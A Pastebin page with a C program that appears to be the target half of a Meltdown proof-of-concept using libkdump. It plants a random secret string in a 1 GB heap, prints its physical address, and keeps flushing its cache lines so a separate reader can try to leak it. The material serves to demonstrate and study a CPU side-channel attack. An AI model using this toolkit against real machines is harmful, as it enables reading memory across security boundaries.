daily pastebin goal
14%
SHARE
TWEET

secret_1gbheap_flush.c

a guest Jan 13th, 2018 75 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #include "libkdump.h"
  2. #include <sched.h>
  3. #include <stdio.h>
  4. #include <stdlib.h>
  5. #include <string.h>
  6. #include <time.h>
  7. #include <x86intrin.h>
  8. #include <sys/mman.h>
  9.  
  10. const char *strings[] = {
  11.     "If you can read this, this is really bad",
  12.     "Burn after reading this string, it is a secret string",
  13.     "Congratulations, you just spied on an application",
  14.     "Wow, you broke the security boundary between user space and kernel",
  15.     "Welcome to the wonderful world of microarchitectural attacks",
  16.     "Please wait while we steal your secrets...",
  17.     "Don't panic... But your CPU is broken and your data is not safe",
  18.     "How can you read this? You should not read this!"};
  19.  
  20. int main(int argc, char *argv[]) {
  21.   libkdump_config_t config;
  22.   config = libkdump_get_autoconfig();
  23.   libkdump_init(config);
  24.  
  25.   srand(time(NULL));
  26.   const char *orig_secret = strings[rand() % (sizeof(strings) / sizeof(strings[0]))];
  27.  
  28.   void *block = malloc(1024 * 1024 * 1024);
  29.   int *junk;
  30.   for (junk = (int*)block; junk < ((char*)block + (1024 * 1024 * 1024)); junk++) {
  31.     *junk = 0x402A402A;
  32.   }
  33.  
  34.   char *secret = (char*)block + (32 * 1024 * 1024);
  35.   strcpy(secret, orig_secret);
  36.  
  37.   int len = strlen(secret);
  38.  
  39.  
  40.   printf("\x1b[32;1m[+]\x1b[0m Secret: \x1b[33;1m%s\x1b[0m\n", secret);
  41.  
  42.   size_t paddr = libkdump_virt_to_phys((size_t)secret);
  43.   if (!paddr) {
  44.     printf("\x1b[31;1m[!]\x1b[0m Program requires root privileges (or read access to /proc/<pid>/pagemap)!\n");
  45.     libkdump_cleanup();
  46.     exit(1);
  47.   }
  48.  
  49.   printf("\x1b[32;1m[+]\x1b[0m Physical address of secret: \x1b[32;1m0x%zx\x1b[0m\n", paddr);
  50.   printf("\x1b[32;1m[+]\x1b[0m Exit with \x1b[37;1mCtrl+C\x1b[0m if you are done reading the secret\n");
  51.  
  52.   while(1) {
  53.     char *cur;
  54.     for (cur = secret; cur < secret + len; cur++) {
  55.       _mm_clflush(cur);
  56.     }
  57.   }
  58.  
  59.   return 0;
  60. }
RAW Paste Data
Top